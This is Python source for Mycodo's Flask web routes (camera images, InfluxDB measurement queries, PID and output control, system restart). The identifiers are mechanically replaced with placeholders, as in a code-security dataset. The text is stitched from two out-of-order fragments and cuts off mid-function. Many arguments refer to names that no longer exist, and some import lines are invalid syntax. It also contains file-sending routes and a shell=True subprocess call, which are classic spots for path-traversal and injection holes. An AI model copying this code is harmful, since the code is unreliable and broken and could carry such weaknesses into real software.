VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_94='COUNT',
VAR_59=start_str,
VAR_60=end_str)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
try:
VAR_84 = VAR_62['series'][0]['values'][0][1]
except:
return '', 204
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_59=start_str,
VAR_60=end_str,
limit=1)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
try:
VAR_87 = VAR_62['series'][0]['values'][0][0]
except:
return '', 204
VAR_51 = datetime.datetime.strptime(
influx_time_str_to_milliseconds(VAR_87),
'%Y-%m-%dT%H:%M:%S.%f')
VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_1.debug('Count = {}'.format(VAR_84))
VAR_1.debug('Start = {}'.format(VAR_51))
VAR_1.debug('End = {}'.format(VAR_52))
VAR_68 = (VAR_52 - VAR_51).total_seconds()
VAR_1.debug('Difference seconds = {}'.format(VAR_68))
if VAR_84 > 700:
VAR_85 = VAR_68 / VAR_84
VAR_1.debug('Seconds per point = {}'.format(VAR_85))
VAR_86 = int(VAR_68 / 700)
VAR_1.debug('Group seconds = {}'.format(VAR_86))
try:
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_94='MEAN',
VAR_59=start_str,
VAR_60=end_str,
group_sec=VAR_86)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
try:
return jsonify(VAR_62['series'][0]['values'])
except:
return '', 204
except Exception as e:
VAR_1.error("URL for 'async_data' raised and error: "
"{err}".format(err=e))
return '', 204
else:
try:
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_83=VAR_29,
VAR_22=channel,
VAR_59=start_str,
VAR_60=end_str)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
return jsonify(VAR_62['series'][0]['values'])
except Exception as e:
VAR_1.error("URL for 'async_data' raised and error: "
"{err}".format(err=e))
return '', 204
@VAR_0.route('/async_usage/<VAR_19>/<VAR_21>/<VAR_22>/<VAR_17>/<VAR_18>')
@flask_login.login_required
def FUNC_19(VAR_19, VAR_21, VAR_22, VAR_17, VAR_18):
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if VAR_17 == '0' and VAR_18 == '0':
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_22=channel,
VAR_94='COUNT')
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
VAR_84 = VAR_62['series'][0]['values'][0][1]
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_22=channel,
limit=1)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
VAR_87 = VAR_62['series'][0]['values'][0][0]
VAR_52 = datetime.datetime.utcnow()
VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
elif VAR_17 != '0' and VAR_18 == '0':
VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_52 = datetime.datetime.utcnow()
VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_22=channel,
VAR_94='COUNT',
VAR_59=start_str,
VAR_60=end_str)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
VAR_84 = VAR_62['series'][0]['values'][0][1]
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_22=channel,
VAR_59=start_str,
VAR_60=end_str,
limit=1)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
VAR_87 = VAR_62['series'][0]['values'][0][0]
else:
VAR_51 = datetime.datetime.utcfromtimestamp(float(VAR_17))
VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_52 = datetime.datetime.utcfromtimestamp(float(VAR_18))
VAR_60 = VAR_52.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_22=channel,
VAR_94='COUNT',
VAR_59=start_str,
VAR_60=end_str)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
VAR_84 = VAR_62['series'][0]['values'][0][1]
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_22=channel,
VAR_59=start_str,
VAR_60=end_str,
limit=1)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
VAR_87 = VAR_62['series'][0]['values'][0][0]
VAR_51 = datetime.datetime.strptime(
influx_time_str_to_milliseconds(VAR_87),
'%Y-%m-%dT%H:%M:%S.%f')
VAR_59 = VAR_51.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
VAR_1.debug('Count = {}'.format(VAR_84))
VAR_1.debug('Start = {}'.format(VAR_51))
VAR_1.debug('End = {}'.format(VAR_52))
VAR_68 = (VAR_52 - VAR_51).total_seconds()
VAR_1.debug('Difference seconds = {}'.format(VAR_68))
if VAR_84 > 700:
VAR_85 = VAR_68 / VAR_84
VAR_1.debug('Seconds per point = {}'.format(VAR_85))
VAR_86 = int(VAR_68 / 700)
VAR_1.debug('Group seconds = {}'.format(VAR_86))
try:
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_22=channel,
VAR_94='MEAN',
VAR_59=start_str,
VAR_60=end_str,
group_sec=VAR_86)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
return jsonify(VAR_62['series'][0]['values'])
except Exception as e:
VAR_1.error("URL for 'async_data' raised and error: "
"{err}".format(err=e))
return '', 204
else:
try:
VAR_61 = query_string(
VAR_21, VAR_19,
VAR_22=channel,
VAR_59=start_str,
VAR_60=end_str)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
return jsonify(VAR_62['series'][0]['values'])
except Exception as e:
VAR_1.error("URL for 'async_usage' raised and error: "
"{err}".format(err=e))
return '', 204
@VAR_0.route('/FUNC_20/<VAR_23>/<VAR_22>/<VAR_24>/<VAR_25>/<VAR_26>')
@flask_login.login_required
def FUNC_20(VAR_23, VAR_22, VAR_24, VAR_25, VAR_26):
if not utils_general.user_has_permission('edit_controllers'):
return 'Insufficient user permissions to manipulate outputs'
if is_int(VAR_22):
VAR_88 = int(VAR_22)
else:
VAR_89 = db_retrieve_table(OutputChannel).filter(
OutputChannel.unique_id == VAR_22).first()
if VAR_89:
VAR_88 = VAR_89.channel
else:
return "Could not determine VAR_22 VAR_92 from VAR_22 ID '{}'".format(VAR_22)
VAR_69 = DaemonControl()
if (VAR_24 in ['on', 'off'] and str_is_float(VAR_26) and
(
(VAR_25 in ['sec', 'pwm'] and float(VAR_26) >= 0) or
VAR_25 == 'vol' or
VAR_25 == 'value'
)):
VAR_90 = VAR_69.output_on_off(
VAR_23,
VAR_24,
VAR_25=output_type,
VAR_26=float(VAR_26),
VAR_88=output_channel)
if VAR_90[0]:
return 'ERROR: {}'.format(VAR_90[1])
else:
return 'SUCCESS: {}'.format(VAR_90[1])
else:
return 'ERROR: unknown parameters: ' \
'output_id: {}, VAR_22: {}, VAR_24: {}, VAR_25: {}, VAR_26: {}'.format(
VAR_23, VAR_22, VAR_24, VAR_25, VAR_26)
@VAR_0.route('/daemonactive')
@flask_login.login_required
def FUNC_21():
try:
VAR_91 = DaemonControl()
return VAR_91.daemon_status()
except Exception as e:
VAR_1.error("URL for 'daemon_active' raised and error: "
"{err}".format(err=e))
return '0'
@VAR_0.route('/systemctl/<VAR_27>')
@flask_login.login_required
def FUNC_22(VAR_27):
if not utils_general.user_has_permission('edit_settings'):
return redirect(url_for('routes_general.home'))
try:
if VAR_27 not in ['restart', 'shutdown', 'daemon_restart', 'frontend_reload']:
flash("Unrecognized command: {VAR_27}".format(
VAR_27=action), "success")
return redirect('/settings')
if DOCKER_CONTAINER:
if VAR_27 == 'daemon_restart':
VAR_91 = DaemonControl()
VAR_91.terminate_daemon()
flash(gettext("Command to restart the VAR_69 sent"), "success")
elif VAR_27 == 'frontend_reload':
subprocess.Popen('docker restart mycodo_flask 2>&1', shell=True)
flash(gettext("Command to reload the frontend sent"), "success")
else:
VAR_108 = '{VAR_34}/mycodo/scripts/mycodo_wrapper {VAR_27} 2>&1'.format(
VAR_34=INSTALL_DIRECTORY, VAR_27=action)
subprocess.Popen(VAR_108, shell=True)
if VAR_27 == 'restart':
flash(gettext("System rebooting in 10 seconds"), "success")
elif VAR_27 == 'shutdown':
flash(gettext("System shutting down in 10 seconds"), "success")
elif VAR_27 == 'daemon_restart':
flash(gettext("Command to restart the VAR_69 sent"), "success")
elif VAR_27 == 'frontend_reload':
flash(gettext("Command to reload the frontend sent"), "success")
return redirect('/settings')
except Exception as e:
VAR_1.error("System command '{VAR_108}' raised and error: "
"{err}".format(VAR_108=VAR_27, err=e))
flash("System command '{VAR_108}' raised and error: "
"{err}".format(VAR_108=VAR_27, err=e), "error")
return redirect(url_for('routes_general.home'))
def FUNC_23(VAR_28, VAR_21, VAR_14, VAR_29=None, VAR_22=None):
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
VAR_61 = query_string(
VAR_21,
VAR_28,
VAR_83=VAR_29,
VAR_22=channel,
VAR_94='LAST',
past_sec=VAR_14)
if VAR_61 == 1:
return [None, None]
try:
VAR_62 = VAR_47.query(VAR_61).raw
VAR_92 = len(VAR_62['series'][0]['values'])
VAR_93 = VAR_62['series'][0]['values'][VAR_92 - 1][0]
VAR_94 = VAR_62['series'][0]['values'][VAR_92 - 1][1]
VAR_94 = '{:.3f}'.format(float(VAR_94))
VAR_95 = date_parse(VAR_93)
VAR_16 = calendar.timegm(VAR_95.timetuple()) * 1000
return [VAR_16, VAR_94]
except KeyError:
return [None, None]
except Exception:
return [None, None]
@VAR_0.route('/last_pid/<VAR_30>/<VAR_31>')
@flask_login.login_required
def FUNC_24(VAR_30, VAR_31):
if not str_is_float(VAR_31):
return '', 204
try:
VAR_70 = PID.query.filter(PID.unique_id == VAR_30).first()
if len(VAR_70.measurement.split(',')) == 2:
VAR_19 = VAR_70.measurement.split(',')[0]
VAR_13 = VAR_70.measurement.split(',')[1]
else:
VAR_19 = None
VAR_13 = None
VAR_96 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_13).first()
if VAR_96:
VAR_109 = Conversion.query.filter(
Conversion.unique_id == VAR_96.conversion_id).first()
else:
VAR_109 = None
(VAR_97,
VAR_98,
VAR_96) = return_measurement_info(
VAR_96, VAR_109)
VAR_99 = None
if VAR_70 and ',' in VAR_70.measurement:
VAR_110 = VAR_70.measurement.split(',')[1]
VAR_111 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_110).first()
if VAR_111:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_111.conversion_id).first()
VAR_37, VAR_99, VAR_37 = return_measurement_info(VAR_111, VAR_80)
VAR_100 = FUNC_23(
VAR_30, 'pid_value', VAR_31, VAR_29='pid_p_value')
VAR_101 = FUNC_23(
VAR_30, 'pid_value', VAR_31, VAR_29='pid_i_value')
VAR_102 = FUNC_23(
VAR_30, 'pid_value', VAR_31, VAR_29='pid_d_value')
if None not in (VAR_100[1], VAR_101[1], VAR_102[1]):
VAR_112 = [VAR_100[0], '{:.3f}'.format(float(VAR_100[1]) + float(VAR_101[1]) + float(VAR_102[1]))]
else:
VAR_112 = None
VAR_103 = None
if VAR_70.band:
try:
VAR_69 = DaemonControl()
VAR_103 = VAR_69.pid_get(VAR_70.unique_id, 'setpoint_band')
except:
VAR_1.debug("Couldn't get setpoint")
VAR_104 = {
'activated': VAR_70.is_activated,
'paused': VAR_70.is_paused,
'held': VAR_70.is_held,
'setpoint': FUNC_23(
VAR_30, VAR_99, VAR_31, VAR_22=0),
'setpoint_band': VAR_103,
'pid_p_value': VAR_100,
'pid_i_value': VAR_101,
'pid_d_value': VAR_102,
'pid_pid_value': VAR_112,
'duration_time': FUNC_23(
VAR_30, 's', VAR_31, VAR_29='duration_time'),
'duty_cycle': FUNC_23(
VAR_30, 'percent', VAR_31, VAR_29='duty_cycle'),
'actual': FUNC_23(
VAR_19,
VAR_98,
VAR_31,
VAR_29=VAR_96,
VAR_22=VAR_97)
}
return jsonify(VAR_104)
except KeyError:
VAR_1.debug("No Data returned form influxdb")
return '', 204
except Exception as e:
VAR_1.exception("URL for 'last_pid' raised and error: "
"{err}".format(err=e))
return '', 204
@VAR_0.route('/FUNC_25/<VAR_9>/<VAR_24>')
@flask_login.login_required
def FUNC_25(VAR_9, VAR_24):
if not utils_general.user_has_permission('edit_controllers'):
return 'Insufficient user permissions to manipulate PID'
VAR_70 = PID.query.filter(PID.unique_id == VAR_9).first()
VAR_69 = DaemonControl()
if VAR_24 == 'activate_pid':
VAR_70.is_activated = True
VAR_70.save()
VAR_37, VAR_105 = VAR_69.controller_activate(VAR_70.unique_id)
return VAR_105
elif VAR_24 == 'deactivate_pid':
VAR_70.is_activated = False
VAR_70.is_paused = False
VAR_70.is_held = False
VAR_70.save()
VAR_37, VAR_105 = VAR_69.controller_deactivate(VAR_70.unique_id)
return VAR_105
elif VAR_24 == 'pause_pid':
VAR_70.is_paused = True
VAR_70.save()
if VAR_70.is_activated:
VAR_105 = VAR_69.pid_pause(VAR_70.unique_id)
else:
VAR_105 = "PID Paused (Note: PID is not currently active)"
return VAR_105
elif VAR_24 == 'hold_pid':
VAR_70.is_held = True
VAR_70.save()
if VAR_70.is_activated:
VAR_105 = VAR_69.pid_hold(VAR_70.unique_id)
else:
VAR_105 = "PID Held (Note: PID is not currently active)"
return VAR_105
elif VAR_24 == 'resume_pid':
VAR_70.is_held = False
VAR_70.is_paused = False
VAR_70.save()
if VAR_70.is_activated:
VAR_105 = VAR_69.pid_resume(VAR_70.unique_id)
else:
VAR_105 = "PID Resumed (Note: PID is not currently active)"
return VAR_105
elif 'set_setpoint_pid' in VAR_24:
VAR_70.setpoint = VAR_24.split('|')[1]
VAR_70.save()
if VAR_70.is_activated:
VAR_105 = VAR_69.pid_set(VAR_70.unique_id, 'setpoint', float(VAR_24.split('|')[1]))
else:
VAR_105 = "PID Setpoint changed (Note: PID is not currently active)"
return VAR_105
|
import calendar
import datetime
import logging
import subprocess
import time
from importlib import import_module
import flask_login
import os
from dateutil.parser import parse as date_parse
from flask import Response
from flask import flash
from flask import jsonify
from flask import redirect
from flask import send_file
from flask import send_from_directory
from flask import url_for
from flask.blueprints import Blueprint
from flask_babel import gettext
from flask_limiter import Limiter
from influxdb import InfluxDBClient
from sqlalchemy import and_
from mycodo.config import DOCKER_CONTAINER
from mycodo.config import INFLUXDB_DATABASE
from mycodo.config import INFLUXDB_HOST
from mycodo.config import INFLUXDB_PASSWORD
from mycodo.config import INFLUXDB_PORT
from mycodo.config import INFLUXDB_USER
from mycodo.config import INSTALL_DIRECTORY
from mycodo.config import LOG_PATH
from mycodo.config import PATH_CAMERAS
from mycodo.config import PATH_NOTE_ATTACHMENTS
from mycodo.databases.models import Camera
from mycodo.databases.models import Conversion
from mycodo.databases.models import DeviceMeasurements
from mycodo.databases.models import Input
from mycodo.databases.models import Math
from mycodo.databases.models import NoteTags
from mycodo.databases.models import Notes
from mycodo.databases.models import Output
from mycodo.databases.models import OutputChannel
from mycodo.databases.models import PID
from mycodo.devices.camera import .camera_record
from mycodo.mycodo_client import DaemonControl
from mycodo.mycodo_flask.routes_authentication import clear_cookie_auth
from mycodo.mycodo_flask.utils import utils_general
from mycodo.mycodo_flask.utils.utils_general import get_ip_address
from mycodo.mycodo_flask.utils.utils_output import get_all_output_states
from mycodo.utils.database import db_retrieve_table
from mycodo.utils.image import .generate_thermal_image_from_pixels
from mycodo.utils.influx import influx_time_str_to_milliseconds
from mycodo.utils.influx import .query_string
from mycodo.utils.system_pi import assure_path_exists
from mycodo.utils.system_pi import is_int
from mycodo.utils.system_pi import return_measurement_info
from mycodo.utils.system_pi import str_is_float
VAR_0 = Blueprint('routes_general',
__name__,
static_folder='../static',
template_folder='../templates')
VAR_1 = logging.getLogger(__name__)
VAR_2 = Limiter(key_func=get_ip_address)
@VAR_0.route('/')
def FUNC_0():
try:
if flask_login.current_user.is_authenticated:
if flask_login.current_user.landing_page == 'live':
return redirect(url_for('routes_page.page_live'))
elif flask_login.current_user.landing_page == 'dashboard':
return redirect(url_for('routes_dashboard.page_dashboard_default'))
elif flask_login.current_user.landing_page == 'info':
return redirect(url_for('routes_page.page_info'))
return redirect(url_for('routes_page.page_live'))
except:
VAR_1.error("User may not be logged in. Clearing cookie auth.")
return clear_cookie_auth()
@VAR_0.route('/index_page')
def FUNC_1():
try:
if not flask_login.current_user.index_page:
return FUNC_0()
elif flask_login.current_user.index_page == 'landing':
return FUNC_0()
else:
if flask_login.current_user.is_authenticated:
if flask_login.current_user.index_page == 'live':
return redirect(url_for('routes_page.page_live'))
elif flask_login.current_user.index_page == 'dashboard':
return redirect(url_for('routes_dashboard.page_dashboard_default'))
elif flask_login.current_user.index_page == 'info':
return redirect(url_for('routes_page.page_info'))
return redirect(url_for('routes_page.page_live'))
except:
VAR_1.error("User may not be logged in. Clearing cookie auth.")
return clear_cookie_auth()
@VAR_0.route('/settings', methods=('GET', 'POST'))
@flask_login.login_required
def FUNC_2():
return redirect('settings/general')
@VAR_0.route('/note_attachment/<VAR_3>')
@flask_login.login_required
def FUNC_3(VAR_3):
VAR_32 = os.path.join(PATH_NOTE_ATTACHMENTS, VAR_3)
if VAR_32 is not None:
try:
if os.path.abspath(VAR_32).startswith(PATH_NOTE_ATTACHMENTS):
return send_file(VAR_32, as_attachment=True)
except Exception:
VAR_1.exception("Send note attachment")
@VAR_0.route('/VAR_8/<VAR_4>/<VAR_5>/<VAR_3>')
@flask_login.login_required
def FUNC_4(VAR_4, VAR_5, VAR_3):
VAR_8 = Camera.query.filter(Camera.unique_id == VAR_4).first()
VAR_33 = assure_path_exists(
os.path.join(PATH_CAMERAS, '{uid}'.format(uid=VAR_8.unique_id)))
if VAR_5 == 'still':
if VAR_8.path_still:
VAR_34 = VAR_8.path_still
else:
VAR_34 = os.path.join(VAR_33, VAR_5)
elif VAR_5 == 'timelapse':
if VAR_8.path_timelapse:
VAR_34 = VAR_8.path_timelapse
else:
VAR_34 = os.path.join(VAR_33, VAR_5)
else:
return "Unknown Image Type"
if os.path.isdir(VAR_34):
VAR_71 = (files for VAR_71 in os.listdir(VAR_34)
if os.path.isfile(os.path.join(VAR_34, VAR_71)))
else:
VAR_71 = []
if VAR_3 in VAR_71:
VAR_46 = os.path.join(VAR_34, VAR_3)
if os.path.abspath(VAR_46).startswith(VAR_34):
return send_file(VAR_46, mimetype='image/jpeg')
return "Image not found"
@VAR_0.route('/camera_acquire_image/<VAR_6>/<VAR_4>/<VAR_7>')
@flask_login.login_required
def FUNC_5(VAR_6, VAR_4, VAR_7):
if VAR_6 == 'new':
VAR_72 = None
elif VAR_6 == 'tmp':
VAR_72 = '{id}_tmp.jpg'.format(id=VAR_4)
else:
return
VAR_34, VAR_3 = camera_record('photo', VAR_4, VAR_72=tmp_filename)
VAR_35 = os.path.join(VAR_34, VAR_3)
VAR_36 = datetime.datetime.now() - datetime.timedelta(seconds=int(VAR_7))
VAR_16 = os.path.getctime(VAR_35)
if datetime.datetime.fromtimestamp(VAR_16) > VAR_36:
VAR_73 = datetime.datetime.fromtimestamp(VAR_16).strftime('%Y-%m-%d %H:%M:%S')
VAR_74 = '["{}","{}"]'.format(VAR_3, VAR_73)
else:
VAR_74 = '["max_age_exceeded"]'
return Response(VAR_74, mimetype='text/json')
@VAR_0.route('/camera_latest_timelapse/<VAR_4>/<VAR_7>')
@flask_login.login_required
def FUNC_6(VAR_4, VAR_7):
VAR_8 = Camera.query.filter(
Camera.unique_id == VAR_4).first()
VAR_37, VAR_38 = utils_general.get_camera_paths(VAR_8)
VAR_39 = os.path.join(VAR_38, str(VAR_8.timelapse_last_file))
if VAR_8.timelapse_last_file is not None and os.path.exists(VAR_39):
VAR_36 = datetime.datetime.now() - datetime.timedelta(seconds=int(VAR_7))
if datetime.datetime.fromtimestamp(VAR_8.timelapse_last_ts) > VAR_36:
VAR_106 = datetime.datetime.fromtimestamp(VAR_8.timelapse_last_ts).strftime("%Y-%m-%d %H:%M:%S")
VAR_74 = '["{}","{}"]'.format(VAR_8.timelapse_last_file, VAR_106)
else:
VAR_74 = '["max_age_exceeded"]'
else:
VAR_74 = '["file_not_found"]'
return Response(VAR_74, mimetype='text/json')
def FUNC_7(VAR_8):
while True:
VAR_75 = VAR_8.get_frame()
yield (b'--VAR_75\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + VAR_75 + b'\r\n')
@VAR_0.route('/FUNC_8/<VAR_9>')
@flask_login.login_required
def FUNC_8(VAR_9):
VAR_40 = Camera.query.filter(Camera.unique_id == VAR_9).first()
VAR_41 = import_module('mycodo.mycodo_flask.camera.camera_' + VAR_40.library).Camera
VAR_41.set_camera_options(VAR_40)
return Response(FUNC_7(VAR_41(VAR_9=unique_id)),
mimetype='multipart/x-mixed-replace; boundary=frame')
@VAR_0.route('/outputstate')
@flask_login.login_required
def FUNC_9():
return jsonify(get_all_output_states())
@VAR_0.route('/outputstate_unique_id/<VAR_9>/<VAR_10>')
@flask_login.login_required
def FUNC_10(VAR_9, VAR_10):
VAR_22 = OutputChannel.query.filter(OutputChannel.unique_id == VAR_10).first()
VAR_42 = DaemonControl()
VAR_24 = VAR_42.output_state(VAR_9, VAR_22.channel)
return jsonify(VAR_24)
@VAR_0.route('/FUNC_11/<VAR_9>')
@flask_login.login_required
def FUNC_11(VAR_9):
VAR_42 = DaemonControl()
VAR_43 = VAR_42.widget_execute(VAR_9)
return jsonify(VAR_43)
@VAR_0.route('/time')
@flask_login.login_required
def FUNC_12():
return jsonify(datetime.datetime.now().strftime('%m/%d %H:%M'))
@VAR_0.route('/dl/<VAR_11>/<VAR_34:VAR_3>')
@flask_login.login_required
def FUNC_13(VAR_11, VAR_3):
if VAR_11 == 'log':
return send_from_directory(LOG_PATH, VAR_3, as_attachment=True)
return '', 204
@VAR_0.route('/last/<VAR_9>/<VAR_12>/<VAR_13>/<VAR_14>')
@flask_login.login_required
def FUNC_14(VAR_9, VAR_12, VAR_13, VAR_14):
if not str_is_float(VAR_14):
return '', 204
if VAR_12 in ['input', 'math', 'function', 'output', 'pid']:
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if VAR_12 in ['input', 'math', 'function', 'output', 'pid']:
VAR_83 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_13).first()
else:
return '', 204
if VAR_83:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_83.conversion_id).first()
else:
VAR_80 = None
VAR_22, VAR_21, VAR_29 = return_measurement_info(
VAR_83, VAR_80)
if hasattr(VAR_83, 'measurement_type') and VAR_83.measurement_type == 'setpoint':
VAR_107 = PID.query.filter(PID.unique_id == VAR_83.device_id).first()
if VAR_107 and ',' in VAR_107.measurement:
VAR_110 = VAR_107.measurement.split(',')[1]
VAR_111 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_110).first()
if VAR_111:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_111.conversion_id).first()
VAR_37, VAR_21, VAR_29 = return_measurement_info(VAR_111, VAR_80)
try:
if VAR_14 != '0':
VAR_61 = query_string(
VAR_21, VAR_9,
VAR_83=VAR_29, VAR_22=channel,
VAR_94='LAST', past_sec=VAR_14)
else:
VAR_61 = query_string(
VAR_21, VAR_9,
VAR_83=VAR_29, VAR_22=channel,
VAR_94='LAST')
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
VAR_92 = len(VAR_62['series'][0]['values'])
VAR_93 = VAR_62['series'][0]['values'][VAR_92 - 1][0]
VAR_94 = VAR_62['series'][0]['values'][VAR_92 - 1][1]
VAR_94 = float(VAR_94)
VAR_95 = date_parse(VAR_93)
VAR_16 = calendar.timegm(VAR_95.timetuple()) * 1000
VAR_104 = '[{},{}]'.format(VAR_16, VAR_94)
return Response(VAR_104, mimetype='text/json')
except KeyError:
VAR_1.debug("No Data returned form influxdb")
return '', 204
except IndexError:
VAR_1.debug("No Data returned form influxdb")
return '', 204
except Exception as e:
VAR_1.exception("URL for 'last_data' raised and error: "
"{err}".format(err=e))
return '', 204
@VAR_0.route('/past/<VAR_9>/<VAR_12>/<VAR_13>/<VAR_15>')
@flask_login.login_required
def FUNC_15(VAR_9, VAR_12, VAR_13, VAR_15):
if not str_is_float(VAR_15):
return '', 204
if VAR_12 == 'tag':
VAR_76 = []
VAR_77 = NoteTags.query.filter(NoteTags.unique_id == VAR_9).first()
VAR_78 = Notes.query.filter(
Notes.date_time >= (datetime.datetime.utcnow() - datetime.timedelta(seconds=int(VAR_15)))).all()
for each_note in VAR_78:
if VAR_77.unique_id in each_note.tags.split(','):
VAR_76.append(
[each_note.date_time.strftime("%Y-%m-%dT%H:%M:%S.000000000Z"), each_note.name, each_note.note])
if VAR_76:
return jsonify(VAR_76)
else:
return '', 204
elif VAR_12 in ['input', 'math', 'function', 'output', 'pid']:
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
if VAR_12 in ['input', 'math', 'function', 'output', 'pid']:
VAR_83 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_13).first()
else:
VAR_83 = None
if not VAR_83:
return "Could not find measurement"
if VAR_83:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_83.conversion_id).first()
else:
VAR_80 = None
VAR_22, VAR_21, VAR_29 = return_measurement_info(
VAR_83, VAR_80)
if hasattr(VAR_83, 'measurement_type') and VAR_83.measurement_type == 'setpoint':
VAR_107 = PID.query.filter(PID.unique_id == VAR_83.device_id).first()
if VAR_107 and ',' in VAR_107.measurement:
VAR_110 = VAR_107.measurement.split(',')[1]
VAR_111 = DeviceMeasurements.query.filter(
DeviceMeasurements.unique_id == VAR_110).first()
if VAR_111:
VAR_80 = Conversion.query.filter(
Conversion.unique_id == VAR_111.conversion_id).first()
VAR_37, VAR_21, VAR_29 = return_measurement_info(VAR_111, VAR_80)
try:
VAR_61 = query_string(
VAR_21, VAR_9,
VAR_83=VAR_29,
VAR_22=channel,
past_sec=VAR_15)
if VAR_61 == 1:
return '', 204
VAR_62 = VAR_47.query(VAR_61).raw
if 'series' in VAR_62 and VAR_62['series']:
return jsonify(VAR_62['series'][0]['values'])
else:
return '', 204
except Exception as e:
VAR_1.debug("URL for 'past_data' raised and error: "
"{err}".format(err=e))
return '', 204
@VAR_0.route('/generate_thermal_image/<VAR_9>/<VAR_16>')
@flask_login.login_required
def FUNC_16(VAR_9, VAR_16):
VAR_44 = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
VAR_33 = assure_path_exists(
os.path.join(PATH_CAMERAS, '{uid}'.format(uid=VAR_9)))
VAR_3 = 'Still-{uid}-{VAR_106}.jpg'.format(
uid=VAR_9,
VAR_106=VAR_44).replace(" ", "_")
VAR_45 = assure_path_exists(os.path.join(VAR_33, 'thermal'))
assure_path_exists(VAR_45)
VAR_46 = os.path.join(VAR_45, VAR_3)
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE)
VAR_48 = Input.query.filter(Input.unique_id == VAR_9).first()
VAR_49 = []
VAR_50 = True
VAR_51 = int(int(VAR_16) / 1000.0) # Round down
VAR_52 = VAR_51 + 1 # Round up
VAR_53 = time.strftime('%Y-%m-%dT%H:%M:%S.000000000Z', time.gmtime(VAR_51))
VAR_54 = time.strftime('%Y-%m-%dT%H:%M:%S.000000000Z', time.gmtime(VAR_52))
for each_channel in range(VAR_48.channels):
VAR_29 = 'channel_{chan}'.format(
chan=each_channel)
VAR_61 = query_string(VAR_29, VAR_9,
VAR_59=VAR_53,
VAR_60=VAR_54)
if VAR_61 == 1:
VAR_1.error('Invalid query string')
VAR_50 = False
else:
VAR_62 = VAR_47.query(VAR_61).raw
if not VAR_62 or 'series' not in VAR_62 or not VAR_62['series']:
VAR_1.error('No measurements to export in this time period')
VAR_50 = False
else:
VAR_49.append(VAR_62['series'][0]['values'][0][1])
if VAR_50:
generate_thermal_image_from_pixels(VAR_49, 8, 8, VAR_46)
return send_file(VAR_46, mimetype='image/jpeg')
else:
return "Could not generate image"
@VAR_0.route('/FUNC_17/<VAR_9>/<VAR_13>/<VAR_17>/<VAR_18>')
@flask_login.login_required
def FUNC_17(VAR_9, VAR_13, VAR_17, VAR_18):
VAR_47 = InfluxDBClient(
INFLUXDB_HOST,
INFLUXDB_PORT,
INFLUXDB_USER,
INFLUXDB_PASSWORD,
INFLUXDB_DATABASE, timeout=100)
VAR_55 = Output.query.filter(Output.unique_id == VAR_9).first()
VAR_48 = Input.query.filter(Input.unique_id == VAR_9).first()
VAR_56 = Math.query.filter(Math.unique_id == VAR_9).first()
if VAR_55:
VAR_79 = VAR_55.name
elif VAR_48:
